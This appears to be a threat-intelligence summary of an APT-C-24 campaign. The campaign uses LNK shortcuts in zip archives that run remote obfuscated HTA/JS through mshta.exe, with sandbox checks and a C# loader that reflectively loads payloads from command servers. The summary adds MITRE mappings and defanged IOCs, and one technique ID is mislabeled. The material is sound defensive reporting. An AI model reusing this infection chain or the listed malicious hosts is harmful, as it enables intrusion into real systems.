APT-C-24 (响尾蛇) uses malicious LNK files inside zip archives to deliver MSHTA-executed obfuscated HTA/JS scripts that memory-load C# loaders and remote payloads, targeting government, military, and energy sectors in South Asia. The campaigns use distinctive URL patterns ending in yui=0/1/2 and domains such as mail163cn.info, with rapid C2 rotation and strong code-obfuscation and evasion techniques. #APT-C-24 #mail163cn.info
Keypoints
- APT-C-24 (响尾蛇) distributes zip archives containing three LNK shortcuts (e.g., file 1.docx.lnk, file 2.docx.lnk, file 3.docx.lnk) that invoke mshta.exe to load remote HTA/JS scripts.
- Remote URLs used by LNKs have characteristic endings yui=0, yui=1, yui=2 and often use themed domain substrings (nepal, army, np, lk, aliyumm) to appear legitimate.
- The HTA/JS scripts are multi-layer obfuscated; they write a disguised file to %TEMP% (e.g., “%TEMP%file 2.docx”), perform Base64 decode and decompression, and conditionally proceed based on environment checks.
- Environment checks include WMI queries for NumberOfCores and physical memory (>810MB); only targets meeting thresholds will have subsequent payloads decoded and memory-loaded.
- Observed follow-up component is a heavily obfuscated C# downloader (MD5 2e382c82d055e6e3a5feb9095d759735) that detects security products, reports them via crafted URLs, decodes/opens deception files, and XOR-decrypts remote data for reflective loading.
- Campaigns show reuse of TTPs and code artifacts across years (similar double-extension .jpg.lnk → .docx.lnk samples, same XOR/keying scheme using first 32 bytes) linking samples to APT-C-24.
- IOCs include many MD5 hashes and numerous malicious URLs (e.g., policy.mail163cn.info, lk.aliyumm.pro) with rapid C2 turnover, complicating capture of final payloads for non-targets.
MITRE Techniques
- [T1204] User Execution – LNK files are delivered in zip archives and rely on user opening the LNK shortcut to trigger mshta.exe execution of remote HTA/JS (“victim runs ‘file 2.docx.lnk’ which uses mshta.exe to execute HTML file at https[:]//policy.mail163cn.info/36287654-New?yui=1”).
- [T1218] Signed Binary Proxy Execution (Mshta) – Attack uses mshta.exe to execute remote HTML/JS scripts (“mshta.exe program executes the HTML file located at https[:]//policy.mail163cn.info/36287654-New?yui=1”).
- [T1059] Command and Scripting Interpreter – Obfuscated JScript/HTA is used to decode, write files to %TEMP% and perform environment checks (“the html file is essentially a jscript carrying encoded obfuscation data” and it writes “%TEMP% file 2.docx”).
- [T1082] System Information Discovery – WMI queries retrieve processor core count and physical memory to decide whether to load next-stage payload (“SELECT NumberOfCores FROM Win32_Processor” and check if physical memory > 810M).
- [T1105] Ingress Tool Transfer – The C# loader fetches further data from remote servers (e.g., https[:]//policy.mail163cn.info/08395961-New) and XOR-decrypts it for reflective loading (“reads data from https[:]//policy.mail163cn.info/08395961-New and XOR decrypts then reflectively loads the remote data”).
- [T1027] Obfuscated Files or Information – Multiple layers of obfuscation and long randomized variable names are used in scripts and .NET payloads to hinder analysis (“scripts are heavily obfuscated; later payloads use long strings to obfuscate variable names and identical decryption algorithm”).
- [T1210] Exploitation of Remote Services / Rapid C2 Rotation (C2 Evasion) – Use of fast-changing C2 domains and targeted payload delivery limits successful downloads for non-targets (“C2 servers have fast invalidation rotation and only deliver subsequent payloads to victims meeting target conditions”).
Indicators of Compromise
- [MD5 ] Observed malicious binaries and scripts – 14632adccc9620b66ac4a3c52946f8c4 (LNK sample), 2e382c82d055e6e3a5feb9095d759735 (C# downloader), and many more (and 35 more hashes).
- [URL ] LNK/HTA hosting and C2 endpoints – https[:]//policy.mail163cn.info/34016917-New?yui=1, https[:]//policy.mail163cn.info/08395961-New, and other related domains such as lk.aliyumm.pro and mail163cn.info resolving to 89.150.45.75.
- [File name ] Deceptive files created or used – “%TEMP%file 2.docx” (disguised content dropped by HTA), file 2.docx.lnk (LNK sample filename).
- [Domain/IP ] Thematic malicious domains and associated IP – domains like mail163cn.info, mailnepalarmymil.mods.email, lk.aliyumm.pro; mail163cn.info subdomains resolved to 89.150.45.75 in observed samples.
Read more: https://www.ctfiot.com/270213.html